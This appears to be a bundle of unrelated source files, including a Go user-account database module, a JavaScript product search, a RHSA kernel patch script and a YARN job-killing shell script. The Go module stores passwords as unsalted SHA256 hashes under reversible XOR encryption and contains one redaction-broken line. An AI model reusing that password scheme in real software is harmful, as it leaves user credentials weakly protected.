	 * NOTE(review): throws NullPointerException when the instance was
	 * built with the no-arg constructor and no user was attached yet —
	 * confirm callers always set the user first.
	 */
	@Override
	public long getId() {
		return this.user.getId();
	}

	public ArrayList<Product> getWishlist() {
		return wishlist;
	}

	/** Adds the product to the wish list unless it is already present. */
	public void setWishlist(Product product) {
		if (!wishlist.contains(product)) {
			this.wishlist.add(product);
		}
	}

	public Product getToDelete() {
		return toDelete;
	}

	/** Marks a product as the pending deletion target. */
	public void setToDelete(Product product) {
		this.toDelete = product;
	}

	/** Removes the product from the wish list; no-op when absent. */
	public void removeItem(Product product) {
		wishlist.remove(product);
	}

	public RegisteredUser getUser() {
		return this.user;
	}

	/** Forwards the id to the owning user. */
	public void setId(long id) {
		user.setId(id);
	}
}
|
# Package entry point: re-export FunctionalANOVA as the public API of the
# fanova package.
from .fanova import FunctionalANOVA

__all__ = ['FunctionalANOVA']
/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.
* Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package log
// Package-level logging entry points. Each variable is nil until
// SetLoger binds it to a concrete Logger, so SetLoger must be called
// before any of these functions are used.
var (
	// Info logs at info severity.
	Info func(args ...interface{})

	// Infof logs a formatted message at info severity.
	Infof func(format string, args ...interface{})

	// Warning logs at warning severity.
	Warning func(args ...interface{})

	// Warningf logs a formatted message at warning severity.
	Warningf func(format string, args ...interface{})

	// Error logs at error severity.
	Error func(args ...interface{})

	// Errorf logs a formatted message at error severity.
	Errorf func(format string, args ...interface{})

	// Fatal logs at fatal severity.
	Fatal func(args ...interface{})

	// Fatalf logs a formatted message at fatal severity.
	Fatalf func(format string, args ...interface{})
)
// SetLoger installs target as the package-level logger by rebinding each
// exported logging function variable to the corresponding method on
// target. It must be called before any of the package-level functions
// are used; until then they are nil.
func SetLoger(target *Logger) {
	Info, Infof = target.Info, target.Infof
	Warning, Warningf = target.Warning, target.Warningf
	Error, Errorf = target.Error, target.Errorf
	Fatal, Fatalf = target.Fatal, target.Fatalf
}
// Logger bundles the severity-specific logging callbacks that SetLoger
// installs as the package-level functions. Each severity has a plain and
// a printf-style variant.
type Logger struct {
	// Info logs to the INFO logs.
	Info  func(args ...interface{})
	Infof func(format string, args ...interface{})

	// Warning logs to the WARNING and INFO logs.
	Warning  func(args ...interface{})
	Warningf func(format string, args ...interface{})

	// Error logs to the ERROR, WARNING and INFO logs.
	Error  func(args ...interface{})
	Errorf func(format string, args ...interface{})

	// Fatal logs to the FATAL, ERROR, WARNING, and INFO logs.
	Fatal  func(args ...interface{})
	Fatalf func(format string, args ...interface{})
}
|
<reponame>Supermoon-JH/OpenSource_Project<filename>src/final project/javascript/search.js
// Global state: `data` holds the product rows parsed from the Excel file,
// `keyword` holds the search term currently typed by the user.
let data;
let keyword;
window.onload = function () {
// Keep the global `keyword` in sync with the #search input field.
document.getElementById('search').addEventListener('change', (e) => {
keyword = e.target.value // update the global keyword whenever the input changes
});
// Run a search when the #search_btn button is clicked.
document.getElementById('search_btn').addEventListener('click', () => {
Search(); // delegate to the Search function below
});
// Fetch the product spreadsheet and parse its first sheet into `data`.
// NOTE(review): XLSX is assumed to be loaded globally by a script tag — verify.
let xhr = new XMLHttpRequest();
xhr.open("GET", "/vegan/py/data_backup.xlsx", true);
xhr.responseType = "blob";
xhr.onload = function (e) {
let file = this.response;
let reader = new FileReader();
if (reader.readAsBinaryString) {
reader.onload = function (e) {
// Parse the workbook and convert the first sheet into an array of row objects.
let workbook = XLSX.read(e.target.result, {type: 'binary'});
let firstSheet = workbook.SheetNames[0];
let excelRows = XLSX.utils.sheet_to_row_object_array(workbook.Sheets[firstSheet]);
data = excelRows
};
reader.readAsBinaryString(file);
}
};
xhr.send();
}
// 검색하는 함수
function Search() {
// 일단 변수 선언 (값은 할당 x)
let items;
// 이미 검색을 한번 해서 검색 결과값이 화면에 있으면 지워주고 없으면 새로 만들어서 진행.
if (!document.getElementById('items')) {
items = document.createElement('div')
items.setAttribute('id', 'items')
} else {
document.getElementById('items').remove()
items = document.createElement('div')
items.setAttribute('id', 'items')
}
for (let i = 0; i < data.length; i++) {
if (data[i].prd_name.split(' ').includes(keyword)) {
let item = document.createElement('div')
item.setAttribute('class', 'item')
let prd_name = document.createElement('p')
prd_name.innerHTML = data[i].prd_name
prd_name.style.fontWeight = 'bold'
let prd_price = document.createElement('p')
prd_price.innerHTML = data[i].prd_price + ' 원'
prd_price.style.textAlign = 'right'
prd_price.style.fontSize = '12px'
let prd_detail = document.createElement('p')
prd_detail.innerHTML = data[i].prd_detail
prd_detail.style.maxHeight = '100px'
prd_detail.style.overflow = 'scroll'
let prd_img = document.createElement('img')
prd_img.setAttribute('src', data[i].prd_img)
item.appendChild(prd_img)
item.appendChild(prd_name)
item.appendChild(prd_price)
item.appendChild(prd_detail)
items.appendChild(item)
}
}
document.getElementById('result').appendChild(items)
}
|
package desarrollomobile.tiendadeclases.tiendadeclases.Service;
import android.os.Parcel;
import android.os.Parcelable;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
/**
 * Parcelable data holder for a sub-category returned by the backend.
 * Fields map 1:1 to the JSON payload via Gson annotations.
 */
public class SubCategorias implements Parcelable {
// URL or path of the sub-category image (JSON key "imagen").
@SerializedName("imagen")
@Expose
private String imagen;
// Display name of the sub-category (JSON key "nombre").
@SerializedName("nombre")
@Expose
private String nombre;
// Nested sub-categories payload, kept as a raw string (JSON key "subCats").
@SerializedName("subCats")
@Expose
private String subCats;
public String getImagen() {
return imagen;
}
public void setImagen(String imagen) {
this.imagen = imagen;
}
public String getNombre() {
return nombre;
}
public void setNombre(String nombre) {
this.nombre = nombre;
}
public String getSubCats() {
return subCats;
}
public void setSubCats(String subCats) {
this.subCats = subCats;
}
@Override
public int describeContents() {
return 0;
}
// Serialization order must match the read order in SubCategorias(Parcel).
@Override
public void writeToParcel(Parcel dest, int flags) {
dest.writeString(this.imagen);
dest.writeString(this.nombre);
dest.writeString(this.subCats);
}
public SubCategorias() {
}
// Deserializes fields in the same order writeToParcel wrote them.
protected SubCategorias(Parcel in) {
this.imagen = in.readString();
this.nombre = in.readString();
this.subCats = in.readString();
}
public static final Parcelable.Creator<SubCategorias> CREATOR = new Parcelable.Creator<SubCategorias>() {
@Override
public SubCategorias createFromParcel(Parcel source) {
return new SubCategorias(source);
}
@Override
public SubCategorias[] newArray(int size) {
return new SubCategorias[size];
}
};
}
|
/*
* Bulldozer Framework
* Copyright (C) DesertBit
*/
package auth
import (
r "github.com/dancannon/gorethink"
db "github.com/desertbit/bulldozer/database"
"fmt"
"github.com/desertbit/bulldozer/log"
"github.com/desertbit/bulldozer/settings"
"github.com/desertbit/bulldozer/utils"
"strings"
"time"
)
const (
// DBUserTable is the RethinkDB table holding user records.
DBUserTable = "users"
// DBUserTableIndex is the secondary index on the LoginName attribute.
DBUserTableIndex = "LoginName"
// maxLength bounds login name, name, e-mail and password lengths.
maxLength = 100
// minPasswordLength is the minimum accepted password length.
minPasswordLength = 8
// A simple addition to the goji.Config.PasswordKey.
// This might be useful, if the password key is stolen from the config,
// however it isn't the final password encryption key.
additionalPasswordKey = "bpw"
cleanupLoopTimeout = 1 * time.Hour // Each one hour.
)
var (
// stopCleanupLoop is closed by releaseDB to stop the cleanupLoop goroutine.
stopCleanupLoop chan struct{} = make(chan struct{})
)
// Register database lifecycle hooks: table creation during setup and
// secondary-index creation once tables exist.
func init() {
db.OnSetup(setupDB)
db.OnCreateIndexes(createIndexes)
}
//########################//
//### Database Structs ###//
//########################//
// dbUser is the persisted representation of a user account.
type dbUser struct {
ID string `gorethink:"id"`
LoginName string
Name string
EMail string
// PasswordHash is the XOR-encrypted SHA256 hash produced by hashPassword.
PasswordHash string
Enabled bool
// LastLogin is a Unix timestamp; -1 marks a never-logged-in account that
// the cleanup loop may remove once expired (see dbAddUser/cleanupExpiredData).
LastLogin int64
// Created is the Unix timestamp of account creation.
Created int64
Groups []string
}
//#######################//
//### Private Methods ###//
//#######################//
// setupDB ensures the users table exists; registered via db.OnSetup.
func setupDB() error {
	return db.CreateTable(DBUserTable)
}
// createIndexes creates the secondary index on LoginName and blocks until
// the index is ready for queries; registered via db.OnCreateIndexes.
func createIndexes() error {
// Create a secondary index on the LoginName attribute.
_, err := r.Table(DBUserTable).IndexCreate(DBUserTableIndex).Run(db.Session)
if err != nil {
return err
}
// Wait for the index to be ready to use.
_, err = r.Table(DBUserTable).IndexWait(DBUserTableIndex).Run(db.Session)
if err != nil {
return err
}
return nil
}
// initDB starts the background cleanup goroutine; pair with releaseDB.
func initDB() {
// Start the cleanup loop in a new goroutine.
go cleanupLoop()
}
// releaseDB stops the cleanup goroutine started by initDB.
// Must be called at most once: closing an already-closed channel panics.
func releaseDB() {
// Stop the loop by triggering the quit trigger.
close(stopCleanupLoop)
}
// dbUserExists reports whether a user with the given login name exists.
func dbUserExists(loginName string) (bool, error) {
	user, err := dbGetUser(loginName)
	if err != nil {
		return false, err
	}
	return user != nil, nil
}
// dbGetUser fetches the user with the given login name via the LoginName
// secondary index. Returns (nil, nil) when no such user exists.
// loginName must not be empty.
func dbGetUser(loginName string) (*dbUser, error) {
if len(loginName) == 0 {
return nil, fmt.Errorf("failed to get database user: login name is empty!")
}
rows, err := r.Table(DBUserTable).GetAllByIndex(DBUserTableIndex, loginName).Run(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to get database user '%s': %v", loginName, err)
}
// Check if nothing was found.
if rows.IsNil() {
return nil, nil
}
var u dbUser
err = rows.One(&u)
if err != nil {
// Check if nothing was found.
if err == r.ErrEmptyResult {
return nil, nil
}
return nil, fmt.Errorf("failed to get database user '%s': %v", loginName, err)
}
return &u, nil
}
// dbGetUserByID fetches the user with the given primary-key ID.
// Returns (nil, nil) when no such user exists. id must not be empty.
func dbGetUserByID(id string) (*dbUser, error) {
if len(id) == 0 {
return nil, fmt.Errorf("failed to get database user: ID is empty!")
}
rows, err := r.Table(DBUserTable).Get(id).Run(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to get database user by ID '%s': %v", id, err)
}
// Check if nothing was found.
if rows.IsNil() {
return nil, nil
}
var u dbUser
err = rows.One(&u)
if err != nil {
// Check if nothing was found.
if err == r.ErrEmptyResult {
return nil, nil
}
return nil, fmt.Errorf("failed to get database user by ID '%s': %v", id, err)
}
return &u, nil
}
func dbAddUser(loginName string, name string, email string, password string, removeOnExpire bool, groups ...string) (u *dbUser, err error) {
// Prepare the inputs.
loginName = strings.TrimSpace(loginName)
name = strings.TrimSpace(name)
email = strings.TrimSpace(email)
// Validate the inputs.
if len(loginName) == 0 || len(loginName) > maxLength ||
len(name) == 0 || len(name) > maxLength ||
len(email) == 0 || len(email) > maxLength ||
len(password) == 0 || len(password) > maxLength {
if len(loginName) > maxLength {
loginName = loginName[:maxLength]
}
return nil, fmt.Errorf("failed to add user '%s': input string sizes are invalid!", loginName)
} else if len(password) < minPasswordLength {
return nil, fmt.Errorf("failed to add user '%s': new passord is to short!", loginName)
}
// Check if the user already exists.
exist, err := dbUserExists(loginName)
if err != nil {
return nil, err
} else if exist {
return nil, fmt.Errorf("failed to add user: user '%s' already exists!", loginName)
}
// Hash and encrypt the password.
password = <PASSWORD>Password(password)
// Create a new unique User ID.
id, err := db.UUID()
if err != nil {
return nil, err
}
// Check if the groups exists.
if len(groups) > 0 {
for _, g := range groups {
if !groupExists(g) {
return nil, fmt.Errorf("failed to add user '%s': the group '%s' does not exists!", loginName, g)
}
}
}
// Create a new user.
u = &dbUser{
ID: id,
LoginName: loginName,
Name: name,
EMail: email,
PasswordHash: password,
Enabled: true,
LastLogin: 0,
Created: time.Now().Unix(),
Groups: groups,
}
if removeOnExpire {
u.LastLogin = -1
}
// Insert it to the database.
_, err = r.Table(DBUserTable).Insert(u).RunWrite(db.Session)
if err != nil {
return nil, fmt.Errorf("failed to insert new user '%s' to database table: %v", loginName, err)
}
return u, nil
}
// dbUpdateUser writes the given user record back to the users table.
// Every group referenced by the user must exist.
func dbUpdateUser(u *dbUser) error {
	// The group list may have changed since the record was loaded;
	// reject updates that reference unknown groups.
	for _, group := range u.Groups {
		if !groupExists(group) {
			return fmt.Errorf("failed to update user '%s': the group '%s' does not exists!", u.LoginName, group)
		}
	}
	_, err := r.Table(DBUserTable).Get(u.ID).Update(u).RunWrite(db.Session)
	return err
}
// dbRemoveUsers deletes the users with the given IDs and fires the
// removed-user event for each. An empty ID list is a no-op.
func dbRemoveUsers(ids ...string) error {
	if len(ids) == 0 {
		return nil
	}
	// GetAll takes variadic interface{} keys; convert the string IDs.
	keys := make([]interface{}, 0, len(ids))
	for _, id := range ids {
		keys = append(keys, id)
	}
	if _, err := r.Table(DBUserTable).GetAll(keys...).Delete().RunWrite(db.Session); err != nil {
		return fmt.Errorf("failed to remove users by IDs '%+v': %v", ids, err)
	}
	// Notify listeners about each removed user.
	for _, id := range ids {
		triggerOnRemovedUser(id)
	}
	return nil
}
// dbUpdateLastLogin stamps the user's LastLogin with the current Unix time
// and persists the record. This also clears the -1 "unconfirmed" marker.
func dbUpdateLastLogin(u *dbUser) error {
// Set the last login time
u.LastLogin = time.Now().Unix()
return dbUpdateUser(u)
}
// dbChangePassword hashes newPassword and persists it as the user's
// password hash. Fails when the new password is shorter than
// minPasswordLength.
func dbChangePassword(u *dbUser, newPassword string) error {
	// Validate input.
	if len(newPassword) < minPasswordLength {
		// FIX: corrected typos in the message ("passord is to short").
		return fmt.Errorf("failed to change password for user '%s': the new password is too short", u.LoginName)
	}
	// Hash and encrypt the password.
	u.PasswordHash = hashPassword(newPassword)
	return dbUpdateUser(u)
}
// TODO: Add an option to retrieve batched users. Don't return all at once!

// dbGetUsersInGroup returns every user whose Groups slice contains the
// given group name.
func dbGetUsersInGroup(group string) ([]*dbUser, error) {
	// Execute the query.
	rows, err := r.Table(DBUserTable).Filter(r.Row.Field("Groups").Contains(group)).Run(db.Session)
	if err != nil {
		// FIX: the messages previously claimed "all database users", which is
		// misleading for a per-group query; include the group name instead.
		return nil, fmt.Errorf("failed to get database users in group '%s': %v", group, err)
	}
	// Get the users from the query.
	var users []*dbUser
	err = rows.All(&users)
	if err != nil {
		return nil, fmt.Errorf("failed to get database users in group '%s': %v", group, err)
	}
	return users, nil
}
//########################//
//### Password methods ###//
//########################//
// hashPassword returns the SHA256 hash of password, XOR-encrypted with the
// configured password encryption key plus the additionalPasswordKey prefix.
// This is the value stored in dbUser.PasswordHash.
func hashPassword(password string) string {
// Hash and encrypt the password
return utils.EncryptXorBase64(additionalPasswordKey+settings.Settings.PasswordEncryptionKey, utils.Sha256Sum(password))
}
// decryptPasswordHash reverses the XOR encryption applied by hashPassword,
// yielding the stored SHA256 hash (NOT the plaintext password).
func decryptPasswordHash(hash string) (password string, err error) {
// Decrypt and generate the temporary SHA256 hash with the session ID and random token.
password, err = utils.DecryptXorBase64(additionalPasswordKey+settings.Settings.PasswordEncryptionKey, hash)
return
}
//###############//
//### Cleanup ###//
//###############//
// cleanupLoop periodically removes expired database data until
// stopCleanupLoop is closed (see releaseDB).
func cleanupLoop() {
	ticker := time.NewTicker(cleanupLoopTimeout)
	defer ticker.Stop()
	for {
		select {
		case <-ticker.C:
			// Cleanup some expired database data.
			cleanupExpiredData()
		case <-stopCleanupLoop:
			return
		}
	}
}
// cleanupExpiredData removes unconfirmed users (LastLogin == -1) whose
// creation time is older than the configured confirmation timeout.
// Errors are logged, not returned, since this runs in a background loop.
func cleanupExpiredData() {
	// Create the expire timestamp.
	expires := time.Now().Unix() - int64(settings.Settings.RemoveNotConfirmedUsersTimeout)
	// Get all expired users: never logged in (-1) and created before `expires`.
	rows, err := r.Table(DBUserTable).Filter(
		r.Row.Field("LastLogin").Eq(-1).
			And(r.Row.Field("Created").Sub(expires).Le(0))).
		Run(db.Session)
	if err != nil {
		// FIX: these messages pass a format string with %v, so the formatting
		// variant must be used; plain Error would print the verb literally.
		log.L.Errorf("failed to get all expired database users: %v", err)
		return
	}
	// Get the users from the query.
	var users []*dbUser
	err = rows.All(&users)
	if err != nil {
		log.L.Errorf("failed to get all expired database users: %v", err)
		return
	}
	if len(users) == 0 {
		return
	}
	// Create the slice of IDs.
	ids := make([]string, len(users))
	for i, u := range users {
		ids[i] = u.ID
	}
	// Remove the users.
	if err = dbRemoveUsers(ids...); err != nil {
		log.L.Errorf("failed to remove all expired database users: %v", err)
	}
}
|
#!/bin/sh
# CYBERWATCH SAS - 2017
#
# Security fix for RHSA-2013:0829
#
# Security announcement date: 2013-05-20 19:43:14 UTC
# Script generation date: 2017-01-17 21:18:26 UTC
#
# Operating System: Red Hat 6
# Architecture: x86_64
#
# Vulnerable packages fix on version:
# - kernel-rt-doc.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt-firmware.noarch:3.6.11.2-rt33.39.el6rt
# - mrg-rt-release.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debug-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-debuginfo-common-x86_64.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-trace-devel.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla-debuginfo.x86_64:3.6.11.2-rt33.39.el6rt
# - kernel-rt-vanilla-devel.x86_64:3.6.11.2-rt33.39.el6rt
#
# Last versions recommended by the security team:
# - kernel-rt-doc.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt-firmware.noarch:3.6.11.2-rt33.39.el6rt
# - mrg-rt-release.noarch:3.6.11.2-rt33.39.el6rt
# - kernel-rt.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debug-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-debuginfo-common-x86_64.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-trace-devel.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla-debuginfo.x86_64:3.10.0-514.rt56.210.el6rt
# - kernel-rt-vanilla-devel.x86_64:3.10.0-514.rt56.210.el6rt
#
# CVE List:
# - CVE-2013-0913
# - CVE-2013-0914
# - CVE-2013-1767
# - CVE-2013-1774
# - CVE-2013-1792
# - CVE-2013-1819
# - CVE-2013-1848
# - CVE-2013-1860
# - CVE-2013-1929
# - CVE-2013-1979
# - CVE-2013-2094
# - CVE-2013-2546
# - CVE-2013-2547
# - CVE-2013-2548
# - CVE-2013-2634
# - CVE-2013-2635
# - CVE-2013-3076
# - CVE-2013-3222
# - CVE-2013-3224
# - CVE-2013-3225
# - CVE-2013-3231
#
# More details:
# - https://www.cyberwatch.fr/vulnerabilites
#
# Licence: Released under The MIT License (MIT), See LICENSE FILE
# Install every fixed package, in the same order as before.
packages="
kernel-rt-doc.noarch-3.6.11.2
kernel-rt-firmware.noarch-3.6.11.2
mrg-rt-release.noarch-3.6.11.2
kernel-rt.x86_64-3.10.0
kernel-rt-debug.x86_64-3.10.0
kernel-rt-debug-debuginfo.x86_64-3.10.0
kernel-rt-debug-devel.x86_64-3.10.0
kernel-rt-debuginfo.x86_64-3.10.0
kernel-rt-debuginfo-common-x86_64.x86_64-3.10.0
kernel-rt-devel.x86_64-3.10.0
kernel-rt-trace.x86_64-3.10.0
kernel-rt-trace-debuginfo.x86_64-3.10.0
kernel-rt-trace-devel.x86_64-3.10.0
kernel-rt-vanilla.x86_64-3.10.0
kernel-rt-vanilla-debuginfo.x86_64-3.10.0
kernel-rt-vanilla-devel.x86_64-3.10.0
"
for package in $packages; do
    sudo yum install "$package" -y
done
|
def reverse_string(input_str):
    """Return ``input_str`` with its characters in reverse order.

    Uses Python's negative-step slice, which is both the idiomatic and the
    O(n) way to reverse a string (the original built the result with
    repeated string concatenation, which is O(n^2)).
    """
    return input_str[::-1]


print(reverse_string("Hello World!"))
<reponame>tnir/gitlab-shell
package config
import (
"os"
"testing"
"github.com/prometheus/client_golang/prometheus"
"github.com/stretchr/testify/require"
"gitlab.com/gitlab-org/gitlab-shell/client/testserver"
"gitlab.com/gitlab-org/gitlab-shell/internal/testhelper"
)
// TestConfigApplyGlobalState verifies that ApplyGlobalState leaves
// SSL_CERT_DIR untouched when SslCertDir is empty and overwrites it when set.
func TestConfigApplyGlobalState(t *testing.T) {
t.Cleanup(testhelper.TempEnv(map[string]string{"SSL_CERT_DIR": "unmodified"}))
config := &Config{SslCertDir: ""}
config.ApplyGlobalState()
require.Equal(t, "unmodified", os.Getenv("SSL_CERT_DIR"))
config.SslCertDir = "foo"
config.ApplyGlobalState()
require.Equal(t, "foo", os.Getenv("SSL_CERT_DIR"))
}
// TestHttpClient verifies that requests made through the configured HTTP
// client are recorded in the gitlab_shell_http_request_seconds metric with
// code/method labels.
func TestHttpClient(t *testing.T) {
url := testserver.StartHttpServer(t, []testserver.TestRequestHandler{})
config := &Config{GitlabUrl: url}
client, err := config.HttpClient()
require.NoError(t, err)
// No handler is registered for this path, so the test server returns 404;
// the request itself must still succeed at the transport level.
_, err = client.Get("http://host.com/path")
require.NoError(t, err)
ms, err := prometheus.DefaultGatherer.Gather()
require.NoError(t, err)
// NOTE(review): assumes the gathered metric families list our metric
// first — brittle if other metrics are registered; verify ordering.
lastMetric := ms[0]
require.Equal(t, lastMetric.GetName(), "gitlab_shell_http_request_seconds")
labels := lastMetric.GetMetric()[0].Label
require.Equal(t, "code", labels[0].GetName())
require.Equal(t, "404", labels[0].GetValue())
require.Equal(t, "method", labels[1].GetName())
require.Equal(t, "get", labels[1].GetValue())
}
|
#!/bin/bash
# Build the Docker image for the Django service from the ./django build
# context, tagging it "loco-django".
docker build -t loco-django django
|
import { Result, Failure, Success} from "amonad"
type Position = [number, number]
type Units = 'km' | 'kilometer' | 'kilometers' | 'm' | 'meters' | 'meter' | 'metre' | 'cm' | 'centimeter' | 'centimeters' | 'mi' | 'mile' | 'miles' | 'feet' | 'ft' | 'in' | 'inch' | 'inches' | 'yd' | 'yard' | 'yards'
// FIX: the list previously contained 'kilometers' twice and omitted
// 'kilometer', so validUnits('kilometer') wrongly returned false even
// though the Units type accepts it. Keep this list in sync with Units.
const unitList: Units[] = ['km', 'kilometer', 'kilometers', 'm', 'meters', 'meter', 'metre', 'cm', 'centimeter', 'centimeters', 'mi', 'mile', 'miles', 'feet', 'ft', 'in', 'inch', 'inches', 'yd', 'yard', 'yards']
// DistanceFrom computes the great-circle (haversine) distance between an
// origin and a destination, convertible into several length units.
// Positions are [latitude, longitude] pairs in degrees.
class DistanceFrom {
// Computed distance in kilometers, wrapped in a Result; starts as a
// Failure until `.to()` has been called with a destination.
private distance: Result<number, Error> = Failure(new Error("Destination is not configured, run distFrom.to()."))
constructor( private origin: Position ) { }
// Converts degrees to radians; throws on a non-numeric input.
degreeToRadians(degrees: number = 0) {
// Math.PI / 180
if (isNaN(degrees)) {
throw new Error('Must input valid number for degrees')
}
return degrees * 0.017453292519943295
}
// This implementation originally appeared at http://www.movable-type.co.uk/scripts/latlong.html
// Courtesy of @chrisveness
// Returns the haversine distance in kilometers between two lat/lon pairs.
distanceInKm(lat1: number, lon1: number, lat2: number, lon2: number) {
// A = sin²(Δφ/2) + cos(φ1)⋅cos(φ2)⋅sin²(Δλ/2)
// δ = 2·atan2(√(a), √(1−a))
// see mathforum.org/library/drmath/view/51879.html for derivation
const sine = (num: number) => Math.sin(num / 2)
const cos = (num: number) => Math.cos(num)
// Mean Earth radius in kilometers.
const radius = 6371
const φ1 = this.degreeToRadians(lat1)
const λ1 = this.degreeToRadians(lon1)
const φ2 = this.degreeToRadians(lat2)
const λ2 = this.degreeToRadians(lon2)
const Δφ = φ2 - φ1
const Δλ = λ2 - λ1
const a = sine(Δφ) * sine(Δφ) + cos(φ1) * cos(φ2) * Math.pow(sine(Δλ), 2)
return 2 * Math.atan2(Math.sqrt(a), Math.sqrt(1 - a)) * radius
}
// Computes and stores the distance to `destination`; returns `this` so
// calls can be chained as distFrom(origin).to(dest).in('km').
to( destination: Position) {
if (!Array.isArray(this.origin)) {
throw new Error('Must use array of [lat, lng] for origin')
}
if (!Array.isArray(destination)) {
throw new Error('Must use array of [lat, lng] for destination')
}
this.distance = Success(
this.distanceInKm(
this.origin[0],
this.origin[1],
destination[0],
destination[1]
)
)
return this
}
// Returns true when `unit` is one of the supported unit strings;
// throws on a falsy or non-string argument.
validUnits(unit: Units) {
if (unit) {
if (typeof unit !== 'string') {
throw new Error('Unit must be type of string')
}
return this.unitList().indexOf(unit) >= 0
}
throw new Error('Must input a unit to determine if valid')
}
// Converts the stored kilometer distance into `units` and unwraps it,
// throwing if `.to()` was never called or the unit is invalid.
// NOTE(review): the second bind returns a plain number — assumes amonad's
// bind lifts non-Result return values into a Success; confirm against the
// amonad documentation before restructuring.
in( units: Units ) {
return this.distance
.bind( distance =>
this.validUnits(units) ?
Success<number, Error>(distance)
:
Failure<number, Error>(new Error('Need to use valid units, run distFrom.unitList() to see list'))
)
.bind( distance => {
if (units === 'mi' || units === 'mile' || units === 'miles')
return distance * 0.6213712
else if (units === 'm' || units === 'meter' || units === 'meters' || units === 'metre')
return distance * 1000
else if (units === 'cm' || units === 'centimeter' || units === 'centimeters')
return distance * 100000
else if (units === 'in' || units === 'inch' || units === 'inches')
return distance * 39370.1
else if (units === 'ft' || units === 'feet')
return distance * 3280.84
else if (units === 'yd' || units === 'yard' || units === 'yards')
return distance * 1093.61
else
return distance
})
.getOrThrow()
}
// Returns a defensive copy of the supported unit strings.
unitList() {
return unitList.slice()
}
}
// Factory entry point: distFrom([lat, lng]) returns a DistanceFrom builder.
module.exports = function (val: Position) {
return new DistanceFrom(val)
}
|
#!/bin/bash
SERVICE=$1
# Dispatch on the requested mode: ALL kills every running YARN app, OLD
# kills apps older than three days, anything else is treated as a single
# application ID to kill.
function main {
case "$1" in
ALL)
stopAllServices
;;
OLD)
stopOldServices
;;
*)
stopInQueue $1
;;
esac
}
# Kill every YARN application currently in the RUNNING state.
function stopAllServices {
# Get all the application IDs into the variable 'result' whose state is RUNNING
# (skip the two header lines of `yarn application -list` output).
result=$(yarn application -list -appStates RUNNING | awk 'NR>2 {print $1}')
for applicationId in $result
#For all the application IDs, run the yarn kill command
do
stopInQueue $applicationId
done
printf "All jobs are killed"
}
# Kill RUNNING YARN applications that have been up for more than three days
# (259200000 ms); keep newer ones.
function stopOldServices {
# Get all the application IDs into the variable 'result' whose state is RUNNING
result=$(yarn application -list -appStates RUNNING | awk 'NR>2 {print $1}')
# Current time in milliseconds, to match YARN's Start-Time field.
nowTime=$(($(date +%s%N)/1000000))
for applicationId in $result
#For all the application IDs, run the yarn kill command
do
applicationStartTime=$(yarn application -status $applicationId |grep "Start-Time" |cut -d ' ' -f 3)
minusTime=$(expr $nowTime - $applicationStartTime)
# 259200000 ms == 3 days
if (( $minusTime > 259200000 ))
then
stopInQueue $applicationId
printf "Stopped OLD: $applicationId "
else
printf "Keep NEW: $applicationId "
fi
done
# Clear spark history logs
#hdfs dfs -rm -r -skipTrash /spark-history/*
}
# Kill the YARN application with the supplied application ID and remove its
# Spark history logs. Prints an error message when no ID was supplied.
# (Historically this looked the ID up by queue name, hence the message text.)
function stopInQueue {
    applicationId=$1
    # FIX: quote the expansion and use -n — the original unquoted
    # `[ ! -z $applicationId ]` collapses to `[ ! -z ]` (always true) when
    # the argument is empty, and breaks on IDs with whitespace.
    if [ -n "$applicationId" ]
    then
        yarn application -kill "$applicationId"
        # Give YARN a moment to finish tearing the application down.
        sleep 2
        hdfs dfs -rm -r -f -skipTrash "/spark-history/$applicationId"*
    else
        printf "Queue name didn't match. Please check your input queue name\n"
    fi
}
main $SERVICE
|
<gh_stars>1-10
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tvcm_stub
from trace_viewer import trace_viewer_project
class SpyProject(trace_viewer_project.TraceViewerProject):
  """TraceViewerProject that additionally searches the spy source tree.

  spy_path is the parent directory of this file; it is appended to the
  project's search paths.
  """
  spy_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
                                          '..'))
  def __init__(self):
    super(SpyProject, self).__init__(
        [self.spy_path])
|
import * as React from 'react';
import { MenuItem } from "../../queries";
export const SubmenuContext = React.createContext<{ addSubmenuItem: (item: MenuItem) => void }>({} as any);
|
import pandas as pd
